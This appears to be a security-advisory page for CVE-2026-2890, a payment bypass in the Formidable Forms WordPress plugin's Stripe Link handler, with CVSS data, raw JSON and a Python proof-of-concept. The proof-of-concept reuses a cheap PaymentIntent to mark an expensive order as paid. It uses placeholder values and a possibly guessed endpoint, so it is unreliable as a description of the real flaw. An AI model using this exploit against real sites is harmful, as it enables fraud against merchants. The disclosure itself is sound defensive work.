Security Vulnerability Report
中文
CVE-2026-2890 CVSS 7.5 HIGH

CVE-2026-2890

Published: 2026-03-13 19:54:35
Last Modified: 2026-04-22 21:30:26
Source: [email protected]

Description

The Formidable Forms plugin for WordPress is vulnerable to a payment integrity bypass in all versions up to, and including, 6.28. This is due to the Stripe Link return handler (`handle_one_time_stripe_link_return_url`) marking payment records as complete based solely on the Stripe PaymentIntent status without comparing the intent's charged amount against the expected payment amount, and the `verify_intent()` function validating only client secret ownership without binding intents to specific forms or actions. This makes it possible for unauthenticated attackers to reuse a PaymentIntent from a completed low-value payment to mark a high-value payment as complete, effectively bypassing payment for goods or services.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Formidable Forms < 6.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-2890 Payment Integrity Bypass PoC Formidable Forms Stripe Link Payment Bypass """ import requests import json TARGET_URL = "https://vulnerable-site.com/wp-json/formidable/stripe/link/return" def exploit_payment_bypass(): """ Attack scenario: 1. Attacker completes a small legitimate payment ($1) to get a valid PaymentIntent 2. Attacker captures the PaymentIntent ID 3. Attacker initiates a high-value purchase ($1000) 4. Instead of paying $1000, attacker reuses the small payment's PaymentIntent 5. System marks the $1000 order as paid based on PaymentIntent status alone """ # Step 1: Get a legitimate PaymentIntent from a small payment small_payment_intent = "pi_legitimate_small_payment_intent_id" # Step 2: Craft request to mark high-value payment as complete payload = { "payment_intent_id": small_payment_intent, "client_secret": "small_payment_client_secret", "form_id": "high_value_form_id", "expected_amount": 100000, # $1000.00 in cents "entry_id": "victim_entry_id" } # The vulnerable endpoint only checks PaymentIntent status, # not whether the amount matches expected_amount response = requests.post(TARGET_URL, json=payload) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: result = response.json() if result.get("success"): print("[!] VULNERABLE: Payment marked as complete!") print("[*] Attacker successfully bypassed payment for high-value order") return True print("[*] Exploit failed or target not vulnerable") return False if __name__ == "__main__": exploit_payment_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2890", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:34.897", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Formidable Forms plugin for WordPress is vulnerable to a payment integrity bypass in all versions up to, and including, 6.28. This is due to the Stripe Link return handler (`handle_one_time_stripe_link_return_url`) marking payment records as complete based solely on the Stripe PaymentIntent status without comparing the intent's charged amount against the expected payment amount, and the `verify_intent()` function validating only client secret ownership without binding intents to specific forms or actions. This makes it possible for unauthenticated attackers to reuse a PaymentIntent from a completed low-value payment to mark a high-value payment as complete, effectively bypassing payment for goods or services."}, {"lang": "es", "value": "El plugin Formidable Forms para WordPress es vulnerable a una elusión de la integridad de pago en todas las versiones hasta la 6.28, inclusive. Esto se debe a que el gestor de retorno de Stripe Link ('handle_one_time_stripe_link_return_url') marca los registros de pago como completados basándose únicamente en el estado del PaymentIntent de Stripe sin comparar el importe cobrado del intent con el importe de pago esperado, y a que la función 'verify_intent()' valida solo la propiedad del secreto del cliente sin vincular los intents a formularios o acciones específicos. Esto hace posible que atacantes no autenticados reutilicen un PaymentIntent de un pago de bajo valor completado para marcar un pago de alto valor como completado, eludiendo eficazmente el pago de bienes o servicios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteHooksController.php#L92", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteLinkController.php#L429", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteLinkController.php#L79", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ebb4bc5a-9469-4733-acf3-d2dda5edb7af?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.